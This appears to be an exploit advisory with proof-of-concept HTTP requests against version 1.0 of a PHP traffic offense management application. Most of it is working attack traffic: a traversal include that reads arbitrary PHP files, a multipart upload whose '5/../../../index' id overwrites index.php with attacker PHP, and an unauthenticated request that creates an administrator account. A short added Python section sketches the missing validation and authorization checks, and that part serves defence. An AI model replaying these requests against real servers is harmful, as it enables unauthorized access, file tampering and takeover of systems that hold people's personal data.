# Exploit Title: Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation
# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files in server
* Performing operations by an unauthenticated user with application administrator rights
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1 - Reading any PHP file from the server
Example vulnerable scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading the rrr.php file belonging to another user on the same server
GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close

[...]</br></br>Hacked file other user in serwer!</br></br>[...]
-----------------------------------------------------------------------------------------------------------------------
## Example 2 - Saving files to parent and child directories and overwriting files in server
# Request to read file
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Online Traffic Offense Management System - PHP</title>[...]
-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite the file index.php in the main webapp directory
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

<?php
echo "Hacked other client files in this hosting!";
?>
-----------------------------329606699635951312463334027403--

# The new file takes its extension from filename="fuzzdb.php"
# The new file's name and location come from 5/../../../index, so the file can be saved in another directory ;)
# The value must start with a digit
# Config files can be overwritten this way
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request to read file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!
-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights
# The application allows many operations to be performed without authorization; it has no permission matrix. The entire application is vulnerable.
# Request adding a new admin user to the application, sent by an unauthorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------210106920639395210803657370685--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request worked fine; log into the app using your hack account
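The three request classes above, as an added example that is not part of the original advisory or the vendor's code: a Python model of the checks whose absence Examples 1, 2 and 4 demonstrate (an allowlist for the `p=`/`page=` include, digit-only id plus image-extension validation for `save_driver`, and a per-action permission matrix for the `classes/*.php?f=` endpoints). `WEBROOT`, the page names, the role ids and the matrix entries are assumptions.

```python
# Added example, not code from the advisory or from the vendor's application.
# WEBROOT, PAGE_ALLOWLIST, ADMIN and PERMISSIONS are assumed values.
import posixpath
import re
from pathlib import PurePosixPath
from typing import Optional

WEBROOT = "/var/www/traffic_offense"                 # assumed install path
PAGE_ALLOWLIST = {"home", "drivers", "offenses"}     # assumed valid p= / page= values
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
ADMIN = 1                                            # assumed: type=1 is the admin role
# (script, f= action) -> roles allowed; anything unlisted is denied (assumed matrix)
PERMISSIONS = {("Users.php", "save"): {ADMIN}, ("Master.php", "save_driver"): {ADMIN}}


def resolve_page(p: str) -> Optional[str]:
    """Example 1: index.php?p= must map to an allowlisted name, never to a raw path."""
    return f"{WEBROOT}/{p}.php" if p in PAGE_ALLOWLIST else None


def safe_upload_path(record_id: str, filename: str) -> Optional[str]:
    """Example 2: the id must be all digits and the stored name is built from it,
    not from the client filename, so '5/../../../index' and 'fuzzdb.php' never reach disk."""
    if not re.fullmatch(r"[0-9]+", record_id):
        return None
    ext = PurePosixPath(filename).suffix.lower()
    if ext not in IMAGE_EXTENSIONS:
        return None
    target = posixpath.normpath(f"{WEBROOT}/uploads/drivers/{record_id}{ext}")
    # belt and braces: the normalized path must still lie inside the uploads directory
    return target if target.startswith(f"{WEBROOT}/uploads/drivers/") else None


def authorize(session_role: Optional[int], script: str, action: str) -> bool:
    """Example 4: every classes/<script>?f=<action> call needs a session whose role
    the matrix permits; no session (role None) or an unknown action is denied."""
    allowed = PERMISSIONS.get((script, action), set())
    return session_role is not None and session_role in allowed
```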